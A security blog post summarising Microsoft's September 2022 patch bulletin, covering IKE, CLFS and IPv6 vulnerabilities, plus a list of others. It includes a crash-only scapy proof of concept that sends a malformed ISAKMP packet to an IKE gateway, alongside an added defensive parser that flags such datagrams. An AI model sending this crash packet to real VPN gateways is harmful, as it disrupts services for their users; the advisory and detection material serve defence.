20 September 2022 CVE Vlad

Microsoft Security Bulletin of September 2022

This month's Microsoft security bulletin is quite intense, even if it does not contain anything that should send the security world into a panic… or maybe it does 😉

Remote code execution on VPN protocol IKE / CVE-2022-34721 and CVE-2022-34722

If you have a Windows server that acts as an IPsec VPN gateway, then it is affected by two remote code execution vulnerabilities that give full control, without authentication.

If, in addition, this server is exposed on the Internet… I think you're going to have a bad weekend 😉.

CVSS score: 9.8/10.

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34721
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34722

As a bonus, here is a proof of concept that is not a reliable exploit: it only crashes the IKE service. Give it a few hours, though, and a stable version will probably be exploited in the wild 😉: https://github.com/78ResearchLab/PoC/tree/main/CVE-2022-34721

The exploit source code:

# Proof of concept from 78ResearchLab (crash only): one malformed ISAKMP datagram sent to UDP/500.
from scapy.all import *
from scapy.contrib.ikev2 import *
from scapy.layers.isakmp import *

import socket, time

# Lab target: the IP address of the IKE gateway under test; IKE listens on UDP port 500.
target = ("192.168.159.134", 500)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# ISAKMP header with a random initiator cookie, a private-use next-payload type (0x84)
# and a private-use exchange type (0xf3); scapy fills in the version and length fields.
pkt = ISAKMP(init_cookie=RandString(8), next_payload=0x84, exch_type=0xf3)
# A single generic payload whose header announces a following payload (type 1) that is never sent.
pkt /= ISAKMP_payload(next_payload=0x1, load=b"\x00\x00\x01\x7f")

sock.sendto(raw(pkt), target)

Please do not launch it on production servers 😄
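The PoC above is a crash trigger, not a signature for the bug (the post does not give the root cause), but the datagram it sends is structurally odd in ways a network sensor can spot. What follows is an added example, not code from the original post or from the 78ResearchLab repository: a dependency-free Python parser for the ISAKMP header and payload chain that flags private-use exchange and payload types, length fields that do not fit the datagram, and a payload chain that announces a payload which never arrives. It is run over a constructed copy of the PoC datagram (fixed cookies in place of the random ones) and over a constructed, well-formed IKEv2 IKE_SA_INIT request; the cookies, sample bytes and placeholder SA body are all made up for the example.

```python
"""Structural sanity checks for ISAKMP/IKE datagrams seen on UDP/500 (added example)."""
import struct

HEADER_LEN = 28       # fixed ISAKMP header (RFC 2408 section 3.1)
PAYLOAD_HDR_LEN = 4   # generic payload header: next payload, reserved, length

# Exchange types registered for IKEv1 (RFC 2408/2409) and IKEv2 (RFC 7296);
# 240-255 is reserved for private use in both protocols.
KNOWN_EXCHANGE_TYPES = {
    0: "NONE", 1: "Base", 2: "Identity Protection", 3: "Authentication Only",
    4: "Aggressive", 5: "Informational", 32: "Quick Mode", 33: "New Group Mode",
    34: "IKE_SA_INIT", 35: "IKE_AUTH", 36: "CREATE_CHILD_SA", 37: "INFORMATIONAL",
}
# Payload types: IKEv1 uses 0-13 (RFC 2408) plus 20-21 (NAT-T, RFC 3947);
# IKEv2 uses 33-53 (RFC 7296 and later); 128-255 is private use in both.
KNOWN_PAYLOAD_TYPES = set(range(0, 14)) | {20, 21} | set(range(33, 54))


def build_datagram(icookie, rcookie, next_payload, version, exch_type, flags, msg_id, payloads):
    """Assemble an ISAKMP datagram; payloads is a list of (next_payload, body) tuples."""
    body = b""
    for nxt, data in payloads:
        body += struct.pack("!BBH", nxt, 0, PAYLOAD_HDR_LEN + len(data)) + data
    header = struct.pack("!8s8sBBBBII", icookie, rcookie, next_payload, version,
                         exch_type, flags, msg_id, HEADER_LEN + len(body))
    return header + body


def parse_isakmp(datagram):
    """Return the header fields, the payload chain and a list of anomalies found."""
    anomalies = []
    if len(datagram) < HEADER_LEN:
        return {"anomalies": [f"datagram is {len(datagram)} bytes, shorter than the 28-byte header"]}
    (icookie, rcookie, next_payload, version, exch_type,
     flags, msg_id, length) = struct.unpack("!8s8sBBBBII", datagram[:HEADER_LEN])

    major = version >> 4
    if major not in (1, 2):
        anomalies.append(f"unknown IKE major version {major}")
    if exch_type not in KNOWN_EXCHANGE_TYPES:
        rng = " (private-use range)" if exch_type >= 240 else ""
        anomalies.append(f"exchange type {exch_type} is not a registered IKE exchange type{rng}")
    if length != len(datagram):
        anomalies.append(f"header length {length} does not match datagram length {len(datagram)}")

    # Walk the payload chain; every declared length must fit inside the datagram.
    payloads = []
    ptype, offset = next_payload, HEADER_LEN
    while ptype != 0 and offset < len(datagram):
        if offset + PAYLOAD_HDR_LEN > len(datagram):
            anomalies.append(f"payload header at offset {offset} is truncated")
            break
        nxt, _reserved, plen = struct.unpack("!BBH", datagram[offset:offset + PAYLOAD_HDR_LEN])
        if ptype not in KNOWN_PAYLOAD_TYPES:
            rng = " (private-use range)" if ptype >= 128 else ""
            anomalies.append(f"payload type {ptype} is not a registered IKE payload type{rng}")
        if plen < PAYLOAD_HDR_LEN or offset + plen > len(datagram):
            anomalies.append(f"payload at offset {offset} declares length {plen}, which does not fit")
            break
        payloads.append((ptype, plen))
        ptype, offset = nxt, offset + plen
    else:
        # Loop ended without a break: the chain must have terminated with next payload 0.
        if ptype != 0:
            anomalies.append(f"payload chain announces next payload {ptype} but the datagram ended")

    return {"exch_type": exch_type, "version": version, "next_payload": next_payload,
            "length": length, "payloads": payloads, "anomalies": anomalies}


def is_suspicious(datagram):
    return bool(parse_isakmp(datagram)["anomalies"])


# Constructed samples with made-up cookies. POC_DATAGRAM reproduces the byte layout the
# PoC above sends: next payload 0x84, exchange type 0xf3, one 4-byte payload whose own
# header announces a further payload of type 1 that never follows.
POC_DATAGRAM = build_datagram(b"\x11" * 8, b"\x00" * 8, 0x84, 0x10, 0xf3, 0, 0,
                              [(0x01, b"\x00\x00\x01\x7f")])
# A well-formed IKEv2 IKE_SA_INIT request with a single SA payload (placeholder body).
BENIGN_DATAGRAM = build_datagram(b"\x22" * 8, b"\x00" * 8, 33, 0x20, 34, 0x08, 0,
                                 [(0, b"\x00" * 12)])

if __name__ == "__main__":
    for name, dg in (("PoC", POC_DATAGRAM), ("benign", BENIGN_DATAGRAM)):
        print(name, "suspicious" if is_suspicious(dg) else "clean", parse_isakmp(dg)["anomalies"])
```

Treat hits as a triage signal for traffic to UDP/500 and 4500 on IKE gateways, not as proof of exploitation: private-use values have legitimate uses, and a real exploit could just as well use registered exchange and payload types, so the patch, not the sensor, is the fix.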

Local privilege escalation with the log API (Windows Common Log File System / CLFS) / CVE-2022-37969

This API is accessible to any application that wants to write logs, and the vulnerability lets an attacker elevate their privileges, but only if they already have a first foothold: code execution or partial control of the target (or a mischievous local user 😅).

The particularity of this vulnerability is that several security companies (Mandiant, Zscaler, CrowdStrike) discovered it being exploited in the wild. Read: some of their customers were hacked, and the attackers used this vulnerability to advance their intrusions, or built it directly into their malware.

Remote code execution on IPv6 / CVE-2022-34718

This one is funny because if you have a Windows system with IPv6 enabled (which is the case by default), then someone can send you a specially crafted network packet that results in code execution, remotely, without authentication. And since the IPv6 stack runs in the kernel, it's a total takeover 🎉.

CVSS score: 9.8/10.

Unless I'm mistaken, this is a routable packet, so the vulnerability looks exploitable across the Internet. And to be fair to Microsoft, IPv6 is recent: they have only supported it for 20 years 😜 (since Windows XP, and properly since XP SP1).
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34718

Other vulnerabilities

There are still plenty of vulnerabilities, some of which are:

  • Code execution in Visual Studio… protect your developers 👍 (CVE-2022-35777, CVE-2022-35825, CVE-2022-35826, CVE-2022-35827);
  • Privilege escalations in Exchange (mail);
  • A nice unauthenticated remote code execution on Windows servers acting as a "PPP" VPN gateway (CVE-2022-30133);
  • Unauthenticated remote code execution in the Bluetooth driver 😨. Disabling Bluetooth on your computer when you don't need it is good practice (CVE-2022-30144);
  • Unauthenticated remote code execution in the NFS file sharing service 😱 (CVE-2022-34715);
  • Unauthenticated remote code execution in the SMB file sharing service, on both client and server 😲 (CVE-2022-35804);
  • A bypass of Excel restrictions that can be used in phishing to obtain code execution (CVE-2022-33631);
  • A local elevation of privileges in the Windows Fax service. Yes, in 2022, the Fax… (CVE-2022-34690);
  • More vulnerabilities in the print spooler. I lost count, but we must have passed the twentieth 🤯 (CVE-2022-35755, CVE-2022-35793);
  • A virtual machine escape on Hyper-V (CVE-2022-34696);
  • A bypass of Credential Guard, which is meant to protect the passwords and password hashes held in memory (CVE-2022-34709);
  • A bypass of Windows Hello authentication, which is supposed to keep your computer locked 🤦‍♂️ (CVE-2022-35797);
  • Bypasses of Secure Boot, which is supposed to protect your computer's boot process (CVE-2022-34301 and CVE-2022-34303);
  • And finally, 16 vulnerabilities in the Chromium-based Edge browser.

Finally

Finally… there are some pretty critical vulnerabilities that need to be patched quickly 😉.

Last funny point: with this bulletin, Microsoft fixes its thousandth flaw of the year. Woohoo… bravo… champagne 🍾.

It's a very nice (ironic) anniversary with which to celebrate the European Commission's publication of its proposal for the "Cyber Resilience Act", which would require vendors to provide security support, security updates, and a guarantee that digital products meet cybersecurity requirements throughout their lifecycle. But that's another topic we'll come back to 😉: https://twitter.com/MaliciaRogue/status/1570366397737222144

Good luck 👍